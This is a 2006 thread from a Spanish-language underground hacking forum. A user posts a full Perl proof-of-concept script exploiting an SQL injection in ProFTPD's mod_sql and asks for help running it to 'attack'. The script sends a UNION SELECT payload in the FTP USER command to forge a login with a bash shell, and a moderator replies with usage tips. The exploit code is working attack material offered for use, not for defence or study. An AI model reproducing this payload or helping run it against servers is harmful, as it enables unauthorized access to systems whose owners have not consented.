Vota por nosotros en el ranking web que participamos

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Octubre 13, 2008, 11:13:32
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderadores: OzX, [ E0F ] d0RkNet)  |  Tema: problema con exploit perl 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: problema con exploit perl  (Leído 276 veces)
nosfer
Visitante
« en: ſeptiembre 16, 2006, 10:45:04 »
#!/usr/bin/perl
# Sql inject on ProFTPD with mod_sql proof of concept script
# runlevel [ runlevel @raregazz.org ]
# Spain, 2003

use IO::Socket;
if( @ARGC<2){
    print "\nProof Of Concept Sql Inject on ProFTPD\n";
    print "Usage: perl poc-sqlftp <target> [1=Alternate query]\n\n";
    exit(0);
};

$server = $ARGV[0];
$query = $ARGV[1];
$remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$server,PeerPort=>"21",Reuse=>1)
                          or die "Can't connect. \n";
if(defined($line=<$remote>)){
    print STDOUT $line;
}

# Proof of concept query, it may change on the number of rows
# By default, it can query User, Pass, Uid, Gid, Shell or
# User, Pass, Uid, Gid, Shell, Path, change the union query...

if($query eq "1"){
    print $remote "USER ')UNION SELECT'u','p',1002,1002,'/tmp','/bin/bash'WHERE(''='\n";
}else{
    print $remote "USER ')UNION SELECT'u','p',1002,1002,'/bin/bash' WHERE(''='\n";
};
if(defined($line=<$remote>)){
    print STDOUT $line;
}
print $remote "PASS p\n";
if(defined($line=<$remote>)){
    print STDOUT $line;
}
print "Sent query to $ARGV[0]\n";
if($line =~ /230/){  #logged in
    print "[------- Sql Inject Able \n";
}else{
    print "[------- Sql Inject Unable \n";
}
close $remote;
consegui ese exploit, lo tengo ya todo compilado, pero a la hora de atacar me dice he probado poniendo la ip, poniendo numeros luego..... la web..... de todo... alguien me puede ayudar por favor? gracias =)
En línea
OzX
Moderadores
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 2100


www.nullbytes.net


Ver Perfil WWW
« Respuesta #1 en: ſeptiembre 17, 2006, 02:36:38 »
mmm parece que te faltan datos.. por lo que vi...

perl nombreexploit.pl ip 1

que raro que no salga mas info sobre el "target".. intenta con eso como borraste los numeros nose si lo isiste asi...

o talves puedes ser

perl nombreexploit.pl 1 IP
En línea

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
www.NULLBYTES.Net
nosfer
Visitante
« Respuesta #2 en: ſeptiembre 17, 2006, 02:43:24 »
Cita de: OzX en ſeptiembre 17, 2006, 02:36:38
mmm parece que te faltan datos.. por lo que vi...

perl nombreexploit.pl ip 1

que raro que no salga mas info sobre el "target".. intenta con eso como borraste los numeros nose si lo isiste asi...

o talves puedes ser

perl nombreexploit.pl 1 IP



he probado a poner de todo :S, si no pongo "nombreexploit.pl" antes de la linea de comandos me dice Can't open perl script "poc-sqlftp": No such file or directory, yo ya no se que hacer :S, he probado a ponerlo con el nombre de la pagina... con la ip, con y sin "nombreexploit.pl" delante, de todo :S y aun asi me dice lo que acabo de nombrar, o lo que puse en el 1er post :S
En línea
OzX
Moderadores
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 2100


www.nullbytes.net


Ver Perfil WWW
« Respuesta #3 en: ſeptiembre 17, 2006, 04:43:34 »
por regla tienes que colcoar
perl nombre.pl

talves n te funke por esto
mod_sql proof of concept script

es una muestra de concepto del script.. talves deves modficar alguhas cosas.. ve el milw0rm si esta..
En línea

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
www.NULLBYTES.Net
nosfer
Visitante
« Respuesta #4 en: ſeptiembre 17, 2006, 06:25:32 »
En línea
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderadores: OzX, [ E0F ] d0RkNet)  |  Tema: problema con exploit perl « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.6 | SMF © 2006-2007, Simple Machines LLC